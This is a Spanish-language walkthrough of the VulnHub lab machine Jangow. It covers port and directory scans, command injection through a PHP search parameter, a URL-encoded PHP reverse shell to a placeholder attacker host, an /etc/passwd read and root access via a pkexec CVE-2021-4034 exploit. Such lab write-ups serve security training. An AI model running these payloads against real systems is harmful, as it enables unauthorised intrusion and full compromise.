Write Up Jangow VulnHub
Escaneo de puertos
nmap -p- --min-rate 5000 -sS <IP>Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-30 05:54 EDT
Nmap scan report for 192.168.5.155
Host is up (0.00043s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-06-10 18:05 site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /
MAC Address: 00:0C:29:1A:67:37 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.16 - 4.6 (97%), Linux 3.2 - 4.9 (97%), Linux 4.4 (97%), Linux 3.13 (94%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Linux 5.1 (91%), Android 5.0 - 6.0.1 (Linux 3.4) (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.5.155
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.36 secondsGobuster
gobuster dir -u http://<IP>/site -w <WORDLIST> -x php,html,txt -t 50 -kInfo:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.155/site
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd.txt (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htaccess.php (Status: 403) [Size: 278]
/.htpasswd.php (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htpasswd.html (Status: 403) [Size: 278]
/.htaccess.txt (Status: 403) [Size: 278]
/.htaccess.html (Status: 403) [Size: 278]
/assets (Status: 301) [Size: 320] [--> http://192.168.5.155/site/assets/]
/css (Status: 301) [Size: 317] [--> http://192.168.5.155/site/css/]
/index.html (Status: 200) [Size: 10190]
/js (Status: 301) [Size: 316] [--> http://192.168.5.155/site/js/]
/wordpress (Status: 301) [Size: 323] [--> http://192.168.5.155/site/wordpress/]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
===============================================================Pero nada interesante...
Puerto 80
Si le damos a Buscar en la URL nos aparecera una especie de .php en el cual podemos poner comandos de linux normales, por lo que podremos inyectar una Reverse Shell...
URL = http://<IP>/site/busque.php?buscar=lsInfo:
assets busque.php css index.html js wordpressURL = http://<IP>/site/busque.php?buscar=cat%20/etc/passwd%20|%20grep%20%271000%27Vemos que hay 1 usuario...
jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bashHaremos la Reverse Shell...
php -r '$sock=fsockopen("<IP>",<PORT>);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'Eso hay que encodearlo en URL...
php+-r+'$sock%3dfsockopen("<PORT>",<PORT>)%3b$proc%3dproc_open("sh",+array(0%3d>$sock,+1%3d>$sock,+2%3d>$sock),$pipes)%3b'URL = http://192.168.5.155/site/busque.php?buscar=php+-r+%27$sock%3dfsockopen(%22<IP>%22,<PORT>)%3b$proc%3dproc_open(%22sh%22,+array(0%3d%3E$sock,+1%3d%3E$sock,+2%3d%3E$sock),$pipes)%3b%27Teniendo la shell ya con el usuario www-data, sanitizamos la shell...
script /dev/null -c bash# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>Nos vamos a /home/jangow01/ para leer la flag...
user.txt (flag1)
d41d8cd98f00b204e9800998ecf8427eSi hacemos lo siguiente...
find / -type f -perm -4000 -ls 2>/dev/nullVeremos lo siguiente...
143191 44 -rwsr-xr-- 1 root messagebus 42992 Apr 1 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
131543 12 -rwsr-xr-x 1 root root 10240 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
143556 40 -rwsr-xr-x 1 root root 38984 Jun 30 2016 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
145251 420 -rwsr-xr-x 1 root root 428240 May 26 2020 /usr/lib/openssh/ssh-keysign
277094 16 -rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
144706 24 -rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
131347 40 -rwsr-xr-x 1 root root 39904 Mar 29 2016 /usr/bin/newgrp
131220 52 -rwsr-xr-x 1 root root 49584 Mar 29 2016 /usr/bin/chfn
144395 52 -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
131358 56 -rwsr-xr-x 1 root root 54256 Mar 29 2016 /usr/bin/passwd
143572 36 -rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newuidmap
143571 36 -rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newgidmap
131222 40 -rwsr-xr-x 1 root root 40432 Mar 29 2016 /usr/bin/chsh
144752 24 -rwsr-xr-x 1 root root 23288 Apr 29 2016 /usr/bin/ubuntu-core-launcher
131442 136 -rwsr-xr-x 1 root root 136808 May 4 2016 /usr/bin/sudo
131283 76 -rwsr-xr-x 1 root root 75304 Mar 29 2016 /usr/bin/gpasswd
275527 32 -rwsr-xr-x 1 root root 30800 Mar 11 2016 /bin/fusermount
262219 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
262236 40 -rwsr-xr-x 1 root root 40128 Mar 29 2016 /bin/su
275556 140 -rwsr-xr-x 1 root root 142032 Feb 17 2016 /bin/ntfs-3g
262254 28 -rwsr-xr-x 1 root root 27608 May 26 2016 /bin/umount
262220 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
262205 40 -rwsr-xr-x 1 root root 40152 May 26 2016 /bin/mountEl que mas nos tiene que interesar es la siguiente linea...
144706 24 -rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexecEs como un /bin/bash pero de otra manera, por lo que utilizaremos un exploit que te lo automatiza todo...
URL = https://github.com/Almorabea/pkexec-exploit
Esto nos lo llevaremos al servidor victima, ya sea copiando el contenido de python o transferirlo con algun comando como curl o wget, una vez teniendolo dentro...
chmod +x CVE-2021-4034.pypython3 CVE-2021-4034.pyInfo:
Do you want to choose a custom payload? y/n (n use default payload) n
[+] Cleaning pervious exploiting attempt (if exist)
[+] Creating shared library for exploit code.
[+] Finding a libc library to call execve
[+] Found a library at <CDLL 'libc.so.6', handle 7fb52c0024e8 at 0x7fb52be96978>
[+] Call execve() with chosen payload
[+] Enjoy your root shell
# whoami
root
#Con esto ya seriamos root, por lo que leeremos la flag...
proof.txt (flag2)
@@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&
@ @@@@@@@@@@@@@@@&# #@@@@@@@@&(. /&@@@@@@@@@@
@ @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@& .&@@@@@
@ @@@@@@@& @@@@@@&@@@@@&%######%&@* ./@@* &@@
@ @@@@@* (@@@@@@@@@#/. .*@. .#&. &@@@&&
@ @@@, /@@@@@@@@#, .@. ,&, @@&&
@ @& @@@@@@@@#. @@@,@@@/ %. #, %@&
@@@# @@@@@@@@/ .@@@@@@@@@@ * ., @@
@@& @@@@@@@@* @@@@@@@@@@@ , @
@& .@@@@@@@( @@@@@@@@@@@@@@@@@@@@@ *. &@
@@/ *@@@@@@@/ @@@@@@@@@@@# @@
@@ .@@@@@@@/ @@@@@@@@@@@@@ @# @@
@@ @@@@@@@@. @@@@@@@@@@@ @@( @@
@& .@@@@@@@@. , @@@@@@@ * .@@@*( .@
@@ ,@@@@@@@@, @@@@@@@@@&*%@@@@@@@@@, @@@@@(%&* &@
@@& @@@@@@@@@@@@@@@@@ (@@@@@@@@@@@@@@%@@/ &@
@ @& ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%* &@
@ @@. .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%* &@&
@ @@@& ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/ &@@&&
@ @@@@@@. *%@@@@@@@@@@@@@@@@@@@@&#/. &@@@@&&
@ @@@@@@@@& JANGOW &@@@
@ &&&&&&&&&@@@& @@(&@ @. %.@ @@%@ &@@@&&&&
&&&@@@@&% &/ (&&@@@&&&
(((((((((((((((((((((((((((((
da39a3ee5e6b4b0d3255bfef95601890afd80709Last updated